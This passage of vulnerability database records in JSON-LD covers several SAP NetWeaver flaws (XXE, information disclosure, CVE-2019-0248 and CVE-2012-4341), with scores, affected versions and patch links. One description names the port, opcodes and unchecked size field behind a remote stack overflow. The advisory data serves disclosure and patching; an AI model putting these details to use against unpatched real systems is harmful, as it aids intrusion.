"data": [
{
"db": "BID",
"id": "97576"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-04-11T00:00:00",
"db": "BID",
"id": "97576"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-19T22:37:00",
"db": "BID",
"id": "97576"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "97576"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Composite Application Framework Authorization Tool XML External Entity Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "97576"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "97576"
}
],
"trust": 0.3
}
}
var-201109-0390
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The com.sap.ipc.webapp.ipcpricing application has an unspecified error that can lead to the disclosure of sensitive information
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201109-0390",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "534817b8-1f88-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The com.sap.ipc.webapp.ipcpricing application has an unspecified error that can lead to the disclosure of sensitive information",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3709"
},
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-3709",
"trust": 0.8
},
{
"db": "IVD",
"id": "534817B8-1F88-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"id": "VAR-201109-0390",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"last_update_date": "2022-05-17T01:53:22.533000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver ipcpricing Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/5107"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=332http"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-09-19T00:00:00",
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"date": "2011-09-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-09-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3709"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver ipcpricing Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3709"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Information leakage",
"sources": [
{
"db": "IVD",
"id": "534817b8-1f88-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201901-1422
Vulnerability from variot
Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted. An attacker can exploit this issue to gain sensitive information, that may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201901-1422",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "basis",
"scope": "eq",
"trust": 1.3,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.51"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.53"
},
{
"model": "basis",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.53"
},
{
"model": "netweaver gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.52"
},
{
"model": "netweaver gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.51"
},
{
"model": "netweaver gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.5"
}
],
"sources": [
{
"db": "BID",
"id": "106471"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.53:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:basis:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-0248"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "106471"
}
],
"trust": 0.3
},
"cve": "CVE-2019-0248",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-0248",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-0248",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-0248",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201901-109",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under certain conditions SAP Gateway of ABAP Application Server (fixed in SAP_GWFND 7.5, 7.51, 7.52, 7.53; SAP_BASIS 7.5) allows an attacker to access information which would otherwise be restricted. \nAn attacker can exploit this issue to gain sensitive information, that may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "BID",
"id": "106471"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-0248",
"trust": 2.7
},
{
"db": "BID",
"id": "106471",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "106471"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"id": "VAR-201901-1422",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:43:29.927000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - January 2019",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=509151985"
},
{
"title": "SAP ABAP Application Server Gateway Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=88298"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.securityfocus.com/bid/106471"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2723142"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=509151985"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-0248"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0248"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=509151994"
}
],
"sources": [
{
"db": "BID",
"id": "106471"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "106471"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-08T00:00:00",
"db": "BID",
"id": "106471"
},
{
"date": "2019-03-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"date": "2019-01-08T20:29:00.970000",
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"date": "2019-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-08T00:00:00",
"db": "BID",
"id": "106471"
},
{
"date": "2019-03-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-001527"
},
{
"date": "2021-09-13T12:23:04.880000",
"db": "NVD",
"id": "CVE-2019-0248"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ABAP Application server SAP Information disclosure vulnerability in gateway",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001527"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201901-109"
}
],
"trust": 0.6
}
}
var-201208-0222
Vulnerability from variot
Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201208-0222",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver abap sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver abap sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver abap sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.02:sp6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.03:sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"credits": {
"@context": {
